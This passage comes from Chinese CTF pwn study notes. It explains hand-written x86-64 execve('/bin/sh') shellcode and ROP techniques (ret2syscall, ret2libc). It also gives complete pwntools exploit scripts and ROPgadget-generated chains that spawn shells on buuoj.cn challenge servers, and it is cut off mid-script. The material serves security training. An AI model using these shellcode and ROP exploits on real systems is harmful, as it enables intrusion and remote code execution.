<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">xor rdi,rdi</span><br><span class="line">    </span><br><span class="line">mov rdi,0x68732f6e69622f</span><br><span class="line">    </span><br><span class="line">push rdi</span><br><span class="line">    </span><br><span class="line">push rsp</span><br><span class="line">    </span><br><span class="line">pop rdi</span><br></pre></td></tr></table></figure>

<p>​		有好几处内容都变了。</p>
<p>​		首先是原本xor rdi,rdi下面的push rdi没了，咦？难道我们不需要去在栈中存入一个零，以来声明字符串的结束么？我们依然需要一个00来去截断字符串，但是此刻你还会发现0x68732f6e69622f中间的两个2f现在就变成了一个2f（此时参数是&#x2F;bin&#x2F;sh） 难道此时不需要去填充够八字节么。是的不需要了，程序发现了我们这个内存单元的内容不够八字节，它会自己帮我们添加一个00上去以来凑齐八字节，并且这个00同时声明了字符串的结束。</p>
<p>​		因此我们不但不需要push一个0，并且还不用去填充八字节，程序帮我们补的00，正好可以去代替原本应该push的0。（值得一提的是如果我们内存单元只有六个字节，那么程序依然会帮我们补全到八个字节，也就是填充两个字节的00）</p>
<p>​		最后的变化就是把原本的lea rdi,[rsp]换成了一个push rsp ;pop rdi（把rsp的值压入栈顶，也就是把rsp的值存入了栈顶内存单元的内容中，再把栈顶的内存单元的内容弹给rdi的值，也就完成了把rsp的值赋给了rdi的值）（在这里一定要区分清楚值与内容的关系）这样做的好处是什么？<strong>这样写的字节更少</strong>，原本lea rdi,[rsp]是四个字节</p>
</li>
</ul>
<p>  <img   src="https://s2.loli.net/2022/06/07/n5Jma4K2OYQ7BXS.png"  alt="img"></p>
<p>  <img   src="https://s2.loli.net/2022/06/07/w4jVgyLbMYJsPnQ.png"  alt="img"></p>
<p>  <img   src="https://s2.loli.net/2022/06/07/LNjIfuTtpRzWJYc.png"  alt="img"></p>
<p>   <b><font color='blue' size=3 face="">最后，就是将execve对应的系统调用号放入rax中，然后syscall即可</font></b> </p>
<p>  那剩下的汇编就是</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">xor rax,rax</span><br><span class="line"></span><br><span class="line">mov rax,0x3b</span><br><span class="line"></span><br><span class="line">syscall</span><br></pre></td></tr></table></figure>

<p>  然后把刚才所写的三部分汇总一下并且精简一下最后仅仅用了0x1e个字节。</p>
<p>  此时只要执行这个shellcode，就可以去拿到shell了。</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">xor rax,rax</span><br><span class="line">push 0x3b</span><br><span class="line">pop rax</span><br><span class="line">xor rdi,rdi</span><br><span class="line">mov rdi ,0x68732f6e69622f</span><br><span class="line">push rdi</span><br><span class="line">push rsp</span><br><span class="line">pop rdi</span><br><span class="line">xor rsi,rsi</span><br><span class="line">xor rdx,rdx</span><br><span class="line">syscall</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>  <img   src="https://s2.loli.net/2022/06/07/TNoUnRDAEt1FYai.png"  alt="img"></p>
<h6 id="例题mrctf2020-shellcode"><a href="#例题mrctf2020-shellcode" class="headerlink" title="例题mrctf2020_shellcode"></a>例题mrctf2020_shellcode</h6><p><a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#mrctf2020_shellcode" >BUUCTF在线评测 (buuoj.cn)<i class="fas fa-external-link-alt"></i></a></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">27143</span>)</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">shellcode=asm(<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">xor rax,rax</span></span><br><span class="line"><span class="string">push 0x3b</span></span><br><span class="line"><span class="string">pop rax</span></span><br><span class="line"><span class="string">xor rdi,rdi</span></span><br><span class="line"><span class="string">mov rdi,0x68732f6e69622f</span></span><br><span class="line"><span class="string">push rdi</span></span><br><span class="line"><span class="string">push rsp</span></span><br><span class="line"><span class="string">pop rdi</span></span><br><span class="line"><span class="string">xor rsi,rsi</span></span><br><span class="line"><span class="string">xor rdx,rdx</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img   src="https://s2.loli.net/2022/06/07/ieYVwvDbsuX9qLk.png"  alt="img"></p>
<p>​	1.将RAX寄存器的值设置为0X3b:RAX &#x3D; 0x3b</p>
<ol start="2">
<li><p>将RDI寄存器的值设置为”&#x2F;bin&#x2F;sh“字符串的地址:RDI&#x3D;&amp;(“&#x2F;bin&#x2F;sh”)</p>
</li>
<li><p>将RSI和RDX寄存器的值都设为0:RSI&#x3D;RDX&#x3D;0</p>
</li>
<li><p>调用sycall</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240708151322943.png"  alt="image-20240708151322943"></p>
</li>
</ol>
<h5 id="用pwntools的shellcraft模块产生shellcode"><a href="#用pwntools的shellcraft模块产生shellcode" class="headerlink" title="用pwntools的shellcraft模块产生shellcode"></a><strong>用pwntools的shellcraft模块产生</strong>shellcode</h5><p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240708150210368.png"  alt="image-20240708150210368"></p>
<h6 id=""><a href="#" class="headerlink" title=""></a><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240709203355548.png"  alt="image-20240709203355548"></h6><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">print</span>(binasii.b2a_hex(pwn.asm(shellcode,arch = <span class="string">&#x27;amd64&#x27;</span>)))<span class="comment">#转换为机器码</span></span><br></pre></td></tr></table></figure>

<h3 id="防御保护机制"><a href="#防御保护机制" class="headerlink" title="防御保护机制"></a>防御保护机制</h3><h4 id="ROP技巧"><a href="#ROP技巧" class="headerlink" title="ROP技巧"></a>ROP技巧</h4><p>NX保护：<strong>数据段不可执行。</strong>在 Windows 系统中被称为 DEP（Data Execution Prevention，<strong>数据执行保护</strong>） 。通常开启了 NX 后，即使有栈溢出漏洞也无法执行写在栈上的 shellcode，随着 NX 保护的开启，以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。当然，攻击者们也提出来相应的方法来绕过保护，别u可通过 ROP 方式来绕过NX跳转至其他地方执行。</p>
<h5 id="Rop技术："><a href="#Rop技术：" class="headerlink" title="Rop技术："></a>Rop技术：</h5><p><strong>栈缓冲区溢出的基础上，通过利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程</strong>，<strong>绕过NX，</strong></p>
<p>gadgets：以ret结尾的指令序列</p>
<h5 id="ROp攻击条件："><a href="#ROp攻击条件：" class="headerlink" title="ROp攻击条件："></a>ROp攻击条件：</h5><ul>
<li>程序存在溢出点（如C语言的gets等不安全的函数），并且可以控制返回地址。</li>
<li>可以找到满足条件的 gadgets 以及相应 gadgets 的地址（如系统调用相关函数system等）</li>
</ul>
<p>寻找gadgets：</p>
<p>​				ROPgatget –binary 程序 – only“pop|ret”</p>
<p>查找eax，c、b、d</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop --only &#x27;pop|ret&#x27; | grep &#x27;ecx&#x27;</span><br></pre></td></tr></table></figure>

<p>找到int80地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop --only &#x27;int&#x27; </span><br></pre></td></tr></table></figure>

<p>在 在静态连接程序中，利用ROPgadget生成现成的ropchain，可以直接实现getshell，但是，通常情况下，由于程序的输入长度有限制，而ROPgadget生成的ropchain过长，导致ropchain无法适用，如果能够针对ropchain进行简单的修改的话，那便能减少构建rop链花费的心思。</p>
<p><strong>如何使用ROPgadget生成ropchain</strong></p>
<p>ROPgadget命令生成ropchain</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary gift_rop --ropchain</span><br></pre></td></tr></table></figure>

<p>2）<a class="link"   target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&spm=1001.2101.3001.7020" >命令执行<i class="fas fa-external-link-alt"></i></a>后，会回显一段很长的gadget段，往上滑，找到ROPgadget构造好的ropchain</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/1c7765c4940d4a968aa95208e4696de4.png"  alt="img"></p>
<p>（3）从 #padding goes here 开始就是ROPgadget构造好的ropchain</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/3cff5b1feca540cb9ce3de1d7ebfe75b.png"  alt="img"></p>
<p>（4）程序没有输入限制情况下，只需将padding填入此处，就能利用现成rop链进行getshell</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/be6864fe50eb4d6f97be2be62a89d017.png"  alt="img"></p>
<h6 id="解析ROPgadget中ropchain原理"><a href="#解析ROPgadget中ropchain原理" class="headerlink" title="解析ROPgadget中ropchain原理"></a>解析ROPgadget中ropchain原理</h6><p>ROPgadget构建的ropchain本质就是执行syscall</p>
<p>（1）填充长度padding：</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/6bb674bfa8af4727860bb1bb02cc2e1f.png"  alt="img"></p>
<p>（2）将rsi设置为.data段的地址，将&#x2F;bin&#x2F;sh写入rax，再将rax的内容写入rsi所指向的地址</p>
<p>（简单来说就是借助rsi和rax两个<a class="link"   target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E5%AF%84%E5%AD%98%E5%99%A8&spm=1001.2101.3001.7020" >寄存器<i class="fas fa-external-link-alt"></i></a>将字符串’&#x2F;bin&#x2F;sh’写入.data段中）</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/6eed2764c4dd4688821900bc20b39ebf.png"  alt="img"></p>
<p>（3）xor rax,rax指令是将寄存器rax清空为0，然后将.data+8地址处的值设置为0</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/40c4d8aa3dd94cf280110abc191fb984.png"  alt="img"></p>
<p>（4）将rdi设置为’&#x2F;bin&#x2F;sh’地址，将rsi，rdx，rbx设置为0（此时@.data+8处是为0的）</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/92aa6c992740442aa9c4b33f52e31018.png"  alt="img"></p>
<p>（5）从padding开始直到syscall调用之前实现rax每次加1</p>
<p>（64位系统的调用号为59（0x3B），所以执行59次指令add rax,1）</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/35fc558a2e59466c8b9a43c98396d29b.png"  alt="img"></p>
<p>（6）最后调用syscall函数</p>
<p><img   src="https://img-blog.csdnimg.cn/direct/cf3abec0d5d54aacb1b2cbd143cba0f2.png"  alt="img"></p>
<p>写Exp：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line">from struct import pack</span><br><span class="line"></span><br><span class="line">r=remote(&#x27;node3.buuoj.cn&#x27;,26917)</span><br><span class="line"></span><br><span class="line">def payload():</span><br><span class="line">        p=&#x27;a&#x27;*(0xc+4)</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0806ecda) # pop edx ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # @ .data</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080b8016) # pop eax ; ret</span><br><span class="line">	p += &#x27;/bin&#x27;</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0805466b) # mov dword ptr [edx], eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0806ecda) # pop edx ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080ea064) # @ .data + 4</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080b8016) # pop eax ; ret</span><br><span class="line">	p += &#x27;//sh&#x27;</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0805466b) # mov dword ptr [edx], eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0806ecda) # pop edx ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080ea068) # @ .data + 8</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080492d3) # xor eax, eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0805466b) # mov dword ptr [edx], eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080481c9) # pop ebx ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # @ .data</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080de769) # pop ecx ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080ea068) # @ .data + 8</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0806ecda) # pop edx ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080ea068) # @ .data + 8</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x080492d3) # xor eax, eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0807a66f) # inc eax ; ret</span><br><span class="line">	p += pack(&#x27;&lt;I&#x27;, 0x0806c943) # int 0x80</span><br><span class="line">        return p</span><br><span class="line"></span><br><span class="line">shell = payload()</span><br><span class="line">r.sendline(shell)</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h6 id="修改ropchain长度详解"><a href="#修改ropchain长度详解" class="headerlink" title="修改ropchain长度详解"></a>修改ropchain长度详解</h6><p>32位：</p>
<p>32位程序对应的syscall为：</p>
<p>​    Int80（0xb ，’&#x2F;bin&#x2F;sh’ ，0 ，0）</p>
<p>​    目标实现：eax&#x3D;0xb ，ebx&#x3D;’binsh’ ，ecx&#x3D;0 ，edx&#x3D;0 ，int0x80_addr</p>
<p>ROPgadget命令查找可修改eax寄存器的gadget进行替代——查找ret地址，将调用号放入<code>eax</code>寄存器，然后执行<code>int 0x80</code>指令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python3</span><br><span class="line"># execve generated by ROPgadget</span><br><span class="line">from struct import pack</span><br><span class="line"># Padding goes here</span><br><span class="line">p = b&#x27;&#x27;</span><br><span class="line"> </span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # @ .data</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">p += b&#x27;/bin&#x27;</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0809a15d) # mov dword ptr [edx], eax ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea064) # @ .data + 4</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">p += b&#x27;//sh&#x27;</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0809a15d) # mov dword ptr [edx], eax ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea068) # @ .data + 8</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x08054250) # xor eax, eax ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0809a15d) # mov dword ptr [edx], eax ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080481c9) # pop ebx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # @ .data</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e851) # pop ecx ; pop ebx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea068) # @ .data + 8</span><br><span class="line">        p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # padding without overwrite ebx</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea068) # @ .data + 8</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x08054250) # xor eax, eax ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret#代替</span><br><span class="line">p += p32(0xb)</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080493e1) # int 0x80</span><br></pre></td></tr></table></figure>

<p>ROPgadget命令查找可以修改ebx,edx,ecx寄存器的gadget</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary simplerop --only &#x27;pop|ret&#x27;|grep ret</span><br></pre></td></tr></table></figure>

<p><img   src="https://img-blog.csdnimg.cn/direct/6b75749b59c448fdb7ad4523084dd3ca.png"  alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">p = b&#x27;&#x27;</span><br><span class="line"></span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # @ .data</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">p += b&#x27;/bin&#x27;</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0809a15d) # mov dword ptr [edx], eax ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea064) # @ .data + 4</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">p += b&#x27;//sh&#x27;</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0809a15d) # mov dword ptr [edx], eax ; ret</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x0806e850) # pop edx ; pop ecx ; pop ebx ; ret</span><br><span class="line">p += p32(0)+p32(0)#将ecx， ebx清零</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # padding without overwrite ebx</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">p += p32(0xb)</span><br><span class="line">p += pack(&#x27;&lt;I&#x27;, 0x080493e1) # int 0x80</span><br></pre></td></tr></table></figure>

<p><strong>ret2text：</strong></p>
<p>查询溢出多少返回地址cyclic -l xxx</p>
<p>ret2syscall：静态，调用系统中断，执行shell</p>
<p>​				通过执行gadgets改变寄存器的值控制程序执行系统调用；</p>
<p>有无系统调用int80&#x2F;syscall</p>
<p>ret2libc：动态链接库控制函数的执行libc中的函数，通常返回到某个函数的plt处，或函数的实际地址</p>
<p>如何找plt地址，gdb调试，main函数断点，输入plt，找到system的plt地址</p>
<p>ret2libc2:没有后门函数，没有system，没有&#x2F;bin&#x2F;sh，找shell</p>
<ul>
<li>​	泄露system函数地址，调用puts，输出got表内容（gdb、b main下断点，r，got）得到函数真实地址，减去libc基地址，得到偏移（p&#x2F;x xxx-xxx），基地址+偏移得到真实地址</li>
<li>找&#x2F;bin&#x2F;sh，（gdb，search “&#x2F;bin&#x2F;sh”）</li>
</ul>
<p>![IMG_20240710_143602_edit_103641333546087](D:\Huawei Share\Huawei Share\IMG_20240710_143602_edit_103641333546087.jpg)</p>
<h6 id="inndy-rop"><a href="#inndy-rop" class="headerlink" title="inndy_rop"></a>inndy_rop</h6><p>查看文件类型–32位静态链接<img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240710171741992.png"  alt="image-20240710171741992"></p>
<p>查看保护–NX开<img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240710171936583.png"  alt="image-20240710171936583"></p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240710173134842.png" ></p>
<p>ROPgadget命令生成ropchain</p>
<p>写EXP</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"><span class="keyword">from</span> struct <span class="keyword">import</span> pack</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node3.buuoj.cn&#x27;</span>,<span class="number">26917</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">payload</span>():</span><br><span class="line">        p=<span class="string">&#x27;a&#x27;</span>*(<span class="number">0xc</span>+<span class="number">4</span>)</span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea060</span>) <span class="comment"># @ .data</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080b8016</span>) <span class="comment"># pop eax ; ret</span></span><br><span class="line">	p += <span class="string">&#x27;/bin&#x27;</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0805466b</span>) <span class="comment"># mov dword ptr [edx], eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea064</span>) <span class="comment"># @ .data + 4</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080b8016</span>) <span class="comment"># pop eax ; ret</span></span><br><span class="line">	p += <span class="string">&#x27;//sh&#x27;</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0805466b</span>) <span class="comment"># mov dword ptr [edx], eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea068</span>) <span class="comment"># @ .data + 8</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080492d3</span>) <span class="comment"># xor eax, eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0805466b</span>) <span class="comment"># mov dword ptr [edx], eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080481c9</span>) <span class="comment"># pop ebx ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea060</span>) <span class="comment"># @ .data</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080de769</span>) <span class="comment"># pop ecx ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea068</span>) <span class="comment"># @ .data + 8</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea068</span>) <span class="comment"># @ .data + 8</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080492d3</span>) <span class="comment"># xor eax, eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, 